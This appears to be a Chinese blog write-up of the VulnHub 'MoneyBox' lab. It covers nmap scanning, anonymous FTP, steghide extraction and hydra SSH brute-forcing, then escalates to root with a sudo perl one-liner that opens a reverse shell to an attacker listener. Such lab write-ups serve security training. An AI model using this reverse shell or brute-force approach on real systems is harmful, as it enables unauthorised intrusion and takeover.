vuln靶场--MoneyBox

最新推荐文章于 2024-06-20 16:24:56 发布
最新推荐文章于 2024-06-20 16:24:56 发布
阅读量846 收藏 3
点赞数
文章标签: linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bobo_milk/article/details/124734313
版权

文章目录

         一、信息收集

         二、漏洞发现

         三、漏洞利用

         四、权限提升

总结

一、信息收集

常规的主机发现以及端口扫描,扫描自己所在的网段。

nmap 192.168.216.0/24

​​​​

nmap -A -v -T4 -p 1-65535 192.168.216.145

可以看到服务器开启了80端口和22ssh的端口和21端口以及一些服务器的信息,网站搭建的中间件以及版本等等信息。 

二、漏洞发现

访问服务器的80端口

一个非常普通的网站,在目前来看并不能发现什么业务功能,页面提示很简单。接下来对网站进行目录扫描,看看能不能发现有信息的文件。

 

扫描的结果有2个页面,依次访问看看是否能够收集有用的信息

 

拉到源代码的下面发现了一个提示,还有一个叫S3cr3t-T3xt的隐藏目录,访问看一下。

查看了源代码后发现了一个密钥        3xtr4ctd4t4

在服务器开放的21端口中有一张图片,打算下载下来看看

网下查找了一下信息,发现可以使用匿名登录到ftp服务器,于是使用kali连接到服务器上将图片下载下来

ftp 192.168.216.145
输入匿名账号:anonymous
密码为空即可

使用命令get trytofind.jpg

图片名字提示尝试去寻找,因此我们来分析这一张图片

网上查找了资料后,发现可以使用steghide工具来对图片进行查看分析,并且该工具能提取图片中隐藏的文件信息。

steghide info trytofind.jpg

结合上面取得的密钥,发现图片隐藏了一个data.txt的文件

steghide extract -sf trytofind.jpg

将文件提取出来查看内容

所以猜测ssh应该有弱口令的漏洞,用户是renu,使用kali的hydra模块对其进行爆破

字典可以自己找,也可以用kali上面自带的字典,路径就在上面写的路径上面,可能需要解压才能使用 

 三、漏洞利用

使用爆破出来的账号和密码连接到服务器

ssh renu@192.168.216.145

成功连接到服务器

获取到第一个flag 

 

 四、权限提升

 第一步想使用sudo进行提权,但是当前这个用户并没有su的权限

 

接着在/home目录下发现了另外的一个用户lily,尝试切换到此用户进行提权 

首先查看了一下history历史命令,发现曾经生成过公钥私钥,并且将公钥拷贝到了lily用户中,生成公钥时,也会在自己的目录下生成公钥和私钥。查看这2个用户下的公钥是否一致。

对比后发现一致,因此可以直接在renu用户下使用ssh切换到lily用户下,并且不需要密钥。 

ssh lily@127.0.0.1

切换成功,拿到了第2个flag ,但是还不是root权限

继续查看history命令,使用了sudo -l,

 不能使用su命令切换到root权限,但是可以使用perl脚本,因此可以使用perl反弹shell,因为perl不需要密码就可以使用sudo,所以反弹过来的shell也是有root权限的。

首先在kali开启一个nc监听7777端口

nc -lnvp 7777

 然后在lily用户使用perl脚本连接到7777端口进行反弹shell

sudo perl -e 'use Socket;$i="192.168.216.128";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

成功拿下root权限 !

 最后的flag是隐藏文件,需要使用ls -a才能看到,拿下最后一个flag!!!完结!!!

总结

没思路时多看看源代码,尝试进行爆破,端口全都要注意

图片可以嵌入隐藏数据,strings <图片>,分析规律,使用steghide工具来提取图片中的数据。

密钥发送到其他用户下可以不用密码可以使用ssh连接到其他用户

sudo -l;sudo -s;history;这些命令可以分析到一些细节,权限利用

一元二次方
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vuln-dev-env
02-20
开发环境要求: 虚拟箱6.1 流浪汉遵循的步骤: 通过运行以下命令将此仓库克隆到您的主机中: vagrant up 使用以下凭据登录到虚拟机: username: vagrant password: vagrant 运行配置脚本: sudo ./scripts/dev-env....
nmap-vuln-scan
02-18
对于“nmap-vuln-scan-master”这个项目,它很可能是包含了一套完整的Nmap漏洞扫描解决方案,包括C#代码、配置文件、扫描策略和可能的自定义NSE脚本。深入研究这个项目,可以帮助我们更好地理解和实践Nmap在C#环境下...
记录一次vuln靶场的渗透过程---driftingblues9
bobo_milk的博客
05-06 1152
一次小渗透记录 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决.
Vuln靶机系列:02TiKi-CMS漏洞利用-对新手非常友好!!!
weixin_45965246的博客
09-17 221
首次使用CMS漏洞该靶机通过的方式有多种,比如:sudo提权、Ubuntu提权使用到的python脚本挺多查看Ubuntu版本使用base64编码写入webshellSmarty沙盒绕过漏洞-RCE反弹shell。
靶场实战】vulntarget-a漏洞靶场实战
最新发布
TT小子的博客
06-20 659
vulntarget-a漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场,其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。
内网渗透--vulntarget-a
m0_66299232的博客
04-04 1005
1.探测到6379端口,这个端口是redis容易造成未授权访问漏洞,可进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。config set dir "C:/phpStudy/PHPTutorial/WWW/" //切换目录。1.由于靶机开放445端口,并且是win7主机,启动msf进行探测、利用。2.用扫描模块探测主机可能存在永恒之蓝漏洞,进行漏洞利用攻击。11.拿到管理员hash,执行提权exp,成功拿下域控!2.成功连接到redis服务,访问成功,不需要密码。
vuln靶机--BreakOut
bobo_milk的博客
05-17 1062
一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 nmap -A -v -T4 -p 1-65535 192.168.216.149 可以看到服务器开启了80端口,139和445端口是samba服务,实现文件共享,10000和20000端口则是搭建了cms,而且版本也暴露了出来。 二、漏洞发现 首先先来查看80端口,只是一个普通的apache的index文件,apache的版本也比较高,因此并没有发现漏洞 在查看了源
vulnstack(一) 红日靶场复现
BuNahua的博客
09-01 2736
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
vuln-cookies:饼干vukn
03-30
追捕后端 适用于vmc-cloud Project Vulnhunting的API REST 在位于config / config.json中的文件中配置数据库凭据 安装依赖项npm install 创建数据库npm运行create-db 运行迁移npm run migration-db ...
ThinkPHP-Vuln-master.zip
08-05
本篇文章将聚焦于"ThinkPHP-Vuln-master.zip"这个压缩包中的内容,深入探讨ThinkPHP历史上的几个关键漏洞,帮助开发者理解并防范潜在的安全风险。 1. **远程代码执行(Remote Code Execution, RCE)漏洞** 在...
Struts2-Vuln-Demo:Struts2防御实例
03-08
前言 开始学习struts2代码审计时,发现各位师傅分析分析的文章很多,但是给突破demo源码的却很少。并且很多重复复现是在struts2官方案例上进行的。而官方案例代码太多,对于初学者来说无法快速聚焦突破点。...
vuln KB-VULN: 1记录
qq_45826388的博客
09-23 422
Description Machine Level : Medium Description : ENUMERATION ENUMERATION and ENUMERATION! This VM is running on VirtualBox. And has 2 flags:user.txt and flag.txt. 靶机:192.168.34.162 端口扫描 源码中发现username hydra 爆破 ssh ,得到密码 登录成功, 家目录下就一个用户 查看sysadmin 目录,得
Vulnhun_VULNCMS: 1
qq_45434762的博客
06-26 522
主机信息kali:192.168.1.12 VULNCMS: 1:192.168.1.6 信息收集使用netdiscover发现目标主机netdiscover -r 192.168.1.0...
nmap vuln脚本扫描结果分析
heiseweiye的博客
08-30 5263
先上图,图中的是使用nmap的vuln的脚本扫描路由器的结果 首先主机已启动,可以看到对应的端口号,开放的服务以及相应的版本信息。 1、http-cookie-flags 检查HTTP服务设置的cookie。报告没有httponly标志的任何会话cookie。报告通过SSL设置而不使用安全标志的任何会话cookie。如果还运行了http-enum.nse,则除了根之外,还将检查由它找到的任何路...
VulnHub靶场之KB-VULN: 2
A_dmin的博客
10-25 626
VulnHub靶场之KB-VULN: 2 扫描IP以及端口: 访问80端口,默认页面,,,,进行目录扫描,熟悉的wordpress: 访问一下,发现显示不全,,,查看一下网页源代码: 添加hosts文件: 再次访问正常,wpscan扫描一下,啥都没扫出来,,,,: 有个admin页面但是没有账号密码进不去,,, 选择转向其他,不是还有个smb么,尝试一下能否匿名登录,有个备份文件: 打开得到一个账号密码,wordpress后台的吧,,,admin/MachineBoy141 尝试登陆,登陆成
带妹玩转Vulnhub【五】
BadRer的博客
10-01 765
前言 今天晚上听说炫酷的女装大佬国庆期间要出去旅游,不能带我飞,很伤心
Vuln:RootThist的步骤
底层社会中的弱智
06-17 304
使用netdiscover针对局域网中主机进行扫描存活 这里Kali攻击机器是192.168.0.106 目标靶机位192.168.0.105 常规的信息收集 端口 存在默认http端口 使用apache 2.4.25 使用debian系统 此中间件版本存在解析漏洞,之后可以用在文件上传上面 目录 Backup中获得加密的zip文件 Drupal CMS存在许多漏洞 CMS漏洞扫描 https://www.ddosi.com/cms-scan/ 推荐的扫...
看完这篇 教你玩转渗透测试靶机vulnhub——MoneyBox: 1
Aluxian_的博客
01-13 1764
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。拿到shell 获取最终的flag,只有拿到root权限才可以发现最终的flag。首先这个靶机比较简单 所以知识点也不多1.信息收集获取ip地址 和端口信息2.FTP匿名登入 隐写工具得使用steghide3.hydra得使用暴力破解4.利用perl进行提权。希望对刚入门得小白有帮助!
MoneyBox靶机实验实战演练
lianliandad的博客
11-16 1466
好好学习
nmap --script=vuln
06-28
### 回答1: nmap --script=vuln是一个nmap命令,用于扫描目标主机的漏洞。该命令会使用nmap的漏洞扫描脚本(vuln)来检测目标主机上可能存在的漏洞。使用该命令可以帮助管理员及时发现并修复系统中的漏洞,提高系统的安全性。 ### 回答2: nmap是一种常用的网络扫描工具,可以用来检测网络上的设备并识别它们的服务和操作系统信息。同时,nmap还提供了一些强大的脚本和工具箱,以帮助用户发现系统中可能存在的漏洞。 使用“nmap --script=vuln”命令可以使用nmap内置的漏洞扫描脚本,这些脚本能够检测目标系统中可能存在的安全漏洞。该命令会启用所有的漏洞扫描脚本,并提供有关目标系统检测结果的详细信息。 在使用“nmap --script=vuln”命令进行漏洞扫描时,可以通过在命令行上使用“-p”参数来指定要扫描的端口范围。对于大型网络中的目标系统,也可以通过指定IP地址范围或使用文件来进行扫描。 当nmap执行漏洞扫描脚本时,脚本会自动检测目标系统中存在的漏洞并生成报告。该报告包含了有关检测到的漏洞的详细信息,例如漏洞名称、等级和漏洞对应的CVE编号等。在扫描过程中,可以使用“-vvv”参数来显示更详细的扫描信息,以便更好地了解扫描的情况。 对于系统管理员和安全专业人士来说,nmap的漏洞扫描功能对于确保系统安全和保护系统免受攻击至关重要。然而,使用该命令进行系统扫描和漏洞检测需要谨慎,因为它可能会导致系统故障或误报漏洞。在使用nmap进行系统扫描之前,确保您已经获得同意,并且对扫描的目标系统进行备份和恢复。 ### 回答3: nmap是一款用于扫描网络主机的开源工具,其功能强大,支持多种操作系统。nmap自带的脚本能够实现许多针对主机的基本漏洞测试,其中就包括vuln脚本。 nmap --script=vuln是指使用vuln脚本来扫描目标网络主机,该脚本是nmap自带的一个组件,用于检测主机是否存在已知的漏洞。如果存在漏洞,则通过输出详细的报告提供可能存在的风险。 使用vuln脚本的方式简单直接,只需要在nmap命令行后加上--script=vuln即可进行扫描。扫描完毕后,nmap会输出详细报告,包含目标主机的漏洞及可能受到的影响。 总体来说,nmap --script=vuln用于检测目标网络主机的漏洞并提供风险报告,有效促进网络安全运营。但是需要注意的是,该脚本只能检测到已知的漏洞,因此不能完全替代其他安全测试工具的使用。在实际应用中,应该综合考虑多种工具的使用,提升网络安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值